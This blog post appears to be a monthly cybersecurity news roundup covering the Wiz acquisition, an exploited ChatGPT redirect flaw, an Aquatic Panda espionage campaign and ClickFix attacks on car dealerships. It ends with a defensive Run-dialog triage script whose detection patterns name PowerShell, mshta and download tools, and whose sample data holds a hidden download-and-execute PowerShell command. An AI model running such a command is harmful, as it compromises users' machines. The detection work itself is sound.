March 25, 2025
The DOT Report is a monthly news series from DOT Security that covers the latest headlines and biggest stories in the cybersecurity field. These stories provide an opportunity to discuss both the technical and human elements at play, exploring how cybersecurity mechanisms and cyberattacks operate in real-world scenarios.
This month we’ll take a look at Google’s massive $32 billion acquisition of the cybersecurity firm Wiz, a bug in ChatGPT being exploited by threat actors, the 10-month-long cyber espionage campaign linked to the known APT group Aquatic Panda, and the ClickFix attack that compromised over 100 car dealerships.
Analyzing these stories reveals deeper insights that help us better understand the relationship between cybersecurity principles in practice and the threat actors working to circumvent them.
Subscribe to the DOT Security blog to stay updated on all things cybersecurity, from the latest headlines to the newest technologies.
Google is making its biggest acquisition ever, agreeing to buy cybersecurity firm Wiz for a jaw-dropping $32 billion. The move cements Google’s commitment to strengthening its cloud security as artificial intelligence drives a surge in demand for more robust protections.
The acquisition is not just a massive financial move—it’s a strategic play to gain an edge over rivals like Microsoft and Amazon in the cloud computing race.
Wiz, a company barely four years old, has skyrocketed to prominence in the cybersecurity world. Founded in 2020 by a group of Israeli military veterans, the firm has rapidly become a leader in cloud security, offering cutting-edge tools to protect data centers.
Now headquartered in New York, Wiz is projected to generate $1 billion in revenue this year—an impressive trajectory that made it a prime target for acquisition. By buying Wiz, Google confirms that cloud security is a top priority and hopes to enhance its security offerings for Google Cloud customers while also cutting costs.
The $32 billion purchase dwarfs Google’s previous record—a $12.5 billion acquisition of Motorola Mobility in 2012. It also ranks as the largest cybersecurity acquisition to date, a clear indication of how critical cloud security has become in today’s tech landscape.
The deal isn’t done quite yet, though. Google is already under intense antitrust scrutiny, meaning regulators and lawmakers alike are going to take a close look at whether the acquisition impacts market competition.
Despite potential regulatory challenges, Google CEO Sundar Pichai remains confident that the acquisition will deliver major benefits, both for the company and its customers. If approved, Wiz could become a cornerstone of Google’s cloud security strategy, helping businesses safeguard their data while reinforcing Google’s position in the AI-driven cloud computing boom.
A newly discovered security flaw in ChatGPT is being actively exploited by cybercriminals, raising alarms for organizations relying on the AI platform. The vulnerability, tracked as CVE-2024-27564 and rated with a CVSS score of 6.5, allows attackers to redirect users to malicious websites directly through the ChatGPT application.
While not the most severe flaw, its exploitation at scale has caught the attention of cybersecurity researchers.
Security firm Veriti first identified the exploit, noting that over 10,000 attack attempts originated from a single IP address in just one week. Their research indicates that 35% of examined organizations remain vulnerable due to misconfigurations in key cybersecurity defenses, including intrusion prevention systems (IPS), web application firewalls (WAFs), and general firewall settings.
U.S. financial institutions have been among the most frequently targeted, making the attack particularly concerning given the sensitivity of the data at risk.
Although OpenAI has not yet commented on the breach, security experts warn that AI-driven platforms like ChatGPT are becoming attractive targets for attackers seeking new avenues to exploit. Organizations that integrate AI tools into their workflows must ensure their security infrastructure is properly configured to detect and mitigate emerging threats.
This latest exploit highlights the evolving nature of cyberattacks in the AI era. As threat actors increasingly focus on AI-powered systems, businesses must remain proactive, routinely auditing their security settings and deploying robust defenses to prevent similar vulnerabilities from being weaponized.
In a meticulously orchestrated cyber-espionage campaign, the China-linked advanced persistent threat (APT) group known as Aquatic Panda has been implicated in a 10-month operation spanning from January to October 2022.
Dubbed "Operation FishMedley" by cybersecurity firm ESET, this campaign targeted seven organizations, including governmental bodies, Catholic charities, NGOs, and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.
Aquatic Panda, also referred to as Bronze University, Charcoal Typhoon, Earth Lusca, and RedHotel, has been active since at least 2019. It is believed to operate under the broader umbrella of the Winnti Group (APT41) and is allegedly overseen by the Chinese contractor i-Soon.
In Operation FishMedley, the threat actors employed a suite of five distinct malware families to infiltrate targeted networks including:
The exact methods by which Aquatic Panda gained initial access to these organizations remain unclear. However, their continued reliance on well-documented implants like ShadowPad and SodaMaster, despite public exposure, underscores a persistent and adaptable threat landscape.
This campaign highlights the ongoing challenges posed by state-sponsored cyber-espionage groups and emphasizes the critical need for organizations worldwide to bolster their cybersecurity defenses against such sophisticated threats.
A supply chain attack has compromised more than 100 car dealership websites, originating from a breach of LES Automotive, a service provider for the automotive industry.
The attack used deceptive ClickFix prompts that tricked users into executing malicious commands through the Windows Run dialog, inadvertently granting attackers system access. Once inside, the attackers deployed malware like SectopRAT to further compromise affected systems.
This breach highlights the growing threat to the automotive sector's digital infrastructure, marking the second major attack on car dealerships in less than a year. It underscores the critical need for organizations to strengthen their cybersecurity practices, particularly when relying on third-party vendors, and to better secure their websites and systems against these sophisticated attack methods.
The ClickFix tactic, which exploits user trust, is gaining traction among cybercriminals, making it essential for users to stay vigilant against such deceptive prompts.
As these types of attacks become more common, organizations must reassess their cybersecurity protocols and integrate advanced threat detection systems. Regular audits of third-party vendors, ongoing user education, and enhanced monitoring of website security can help mitigate risks and safeguard against similar attacks in the future.
With cybercriminals continuously evolving their methods, proactive measures are vital to protecting sensitive data and maintaining trust with customers.
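One way to hunt for the Run-dialog step of ClickFix described above, shown as an added example rather than anything from DOT Security or the affected vendors: Windows records commands typed into the Run dialog under each user's `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key, so exported values can be scored for script hosts, remote URLs, and lure comments. The indicator list, weights, threshold, and sample entries are assumptions constructed for illustration.

```python
import re

# Heuristic indicators (name, weight, pattern) chosen for this example only.
INDICATORS = [
    ("script_host", 2, re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|cmd)(\.exe)?\b", re.I)),
    ("remote_url", 2, re.compile(r"https?://", re.I)),
    ("hidden_or_encoded", 2, re.compile(r"\s-(w|win|windowstyle)\s+h(idden)?\b|\s-(e|enc|encodedcommand)\s", re.I)),
    ("download_and_run", 2, re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|curl|certutil|bitsadmin)\b", re.I)),
    ("lure_comment", 3, re.compile(r"#.*(robot|captcha|verif)", re.I)),
]
THRESHOLD = 4  # assumed cut-off: a script host plus at least one more indicator

def parse_runmru(values):
    """Return Run-dialog commands, most recent first, from exported RunMRU values."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:
            continue  # MRUList can reference an entry that was deleted
        # Each entry is stored with a trailing "\1" marker; drop it.
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands

def score(command):
    """Return (total weight, matched indicator names) for one command line."""
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(command)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def triage(values):
    """Return (command, score, indicator names) for entries at or above THRESHOLD."""
    flagged = []
    for command in parse_runmru(values):
        total, names = score(command)
        if total >= THRESHOLD:
            flagged.append((command, total, names))
    return flagged

# Constructed sample export of one user's RunMRU key (not real incident data).
SAMPLE = {
    "MRUList": "cdabe",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iwr https://example.invalid/fix.txt | iex" # I am not a robot - Verification ID 4821\\1',
    "d": "mshta https://example.invalid/verify.hta\\1",
    "e": "https://intranet.example.invalid/wiki\\1",
}

if __name__ == "__main__":
    for command, total, names in triage(SAMPLE):
        print(f"[{total}] {', '.join(names)} :: {command}")
```
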
The stories this month covered a range of cybersecurity topics from major industry acquisitions to the ways threat actors are exploiting AI integrations, and how some of our oldest markets, like the auto industry, are prime targets for cybercriminals.
By investigating these stories, we gain a better understanding of the real-life threats that businesses face and get a stark reminder of how crucial cybersecurity has become in a tech-dependent world.